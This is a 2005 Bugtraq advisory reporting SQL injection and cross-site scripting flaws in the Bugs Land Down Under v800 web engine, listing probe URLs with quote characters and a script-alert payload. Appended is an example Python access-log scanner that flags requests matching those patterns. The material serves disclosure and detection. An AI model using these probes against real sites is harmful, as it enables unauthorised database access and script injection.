Message-ID: <20050820094301.23980.qmail@securityfocus.com>
Date: 20 Aug 2005 09:43:01 -0000
From: bl2k@...bgard.org
To: bugtraq@...urityfocus.com
Subject: Bugs Land Down Under v800
Bugs Land Down Under v800
PHP/MySQL Website engine
Copyright Neocrome - http://www.neocrome.net
---------------------------------------------
SQL Injection and Cross Site Scripting Problem
Example:
/ldu/forums.php?m=topics&s='
/ldu/list.php?c=articles&s=title&w=asc&o='&p=1
/ldu/list.php?c=articles&s=title&w='&o=1&p=1
/ldu/list.php?c=articles&s='&w=asc&o=1&p=1
/ldu/journal.php?m='&s=username&w=asc
/ldu/journal.php?m='&p=1
/ldu/journal.php?m='
/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
/ldu/forums.php?m=topics&q=3&n='
/ldu/list.php?c=articles&s=title&w=asc&o=1&p='
/ldu/forums.php?m='&q=3&n=last
/ldu/links.php?c=links&s=title&w='
---------------------------------------------
/ldu/index.php?c='><script>alert('test');</script>
/ldu/index.php?m='><script>alert('test');</script>
/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script>
bl2k & SmallMouse
Greetz --elite-- , hurgy , Littlehackers , Cisco
www.shabgard.org
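
For triage, the script and parameter pairs listed in the advisory can be turned into an access-log check. The following is an added example, not part of the original post and not Neocrome code; the names classify, scan and REPORTED, the combined log format and the sample log lines are assumptions made for illustration, as is the premise that legitimate values of these parameters never contain quotes or angle brackets.

```python
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters the advisory shows carrying the injected value.
REPORTED = {
    "forums.php": {"m", "s", "x", "n"},
    "list.php": {"s", "w", "o", "p"},
    "journal.php": {"m", "w"},
    "links.php": {"w"},
    "index.php": {"c", "m"},
}
# Assumption: legitimate values are plain tokens such as "asc", "title", "1".
SQL_CHARS = set("'\"")
MARKUP_CHARS = set("<>")

def classify(request_target):
    """Return [(param, kind), ...] for one request target (path + query)."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qsl percent-decodes, so %27 and %3C are caught like ' and <.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name not in REPORTED.get(script, ()):
            continue
        if MARKUP_CHARS & set(value):
            findings.append((name, "xss-probe"))
        elif SQL_CHARS & set(value):
            findings.append((name, "sqli-probe"))
    return findings

def scan(log_lines):
    """Yield (client, target, findings) for combined-format access log lines."""
    for line in log_lines:
        try:
            client = line.split(" ", 1)[0]
            target = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue  # malformed line, nothing to inspect
        hits = classify(target)
        if hits:
            yield client, target, hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [20/Aug/2005:09:50:01 +0000] "GET /ldu/list.php?c=articles&s=title&w=asc&o=1&p=1 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [20/Aug/2005:09:50:09 +0000] "GET /ldu/list.php?c=articles&s=title&w=%27&o=1&p=1 HTTP/1.0" 200 812',
    '203.0.113.9 - - [20/Aug/2005:09:51:30 +0000] "GET /ldu/index.php?c=%27%3E%3Cscript%3Ealert(%27test%27)%3B%3C/script%3E HTTP/1.0" 200 4410',
]

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE):
        print(client, hits, target)
```

A hit means a request matching the reported pattern reached the server, not that it succeeded; the response size and any database errors logged at the same time are the next things to check.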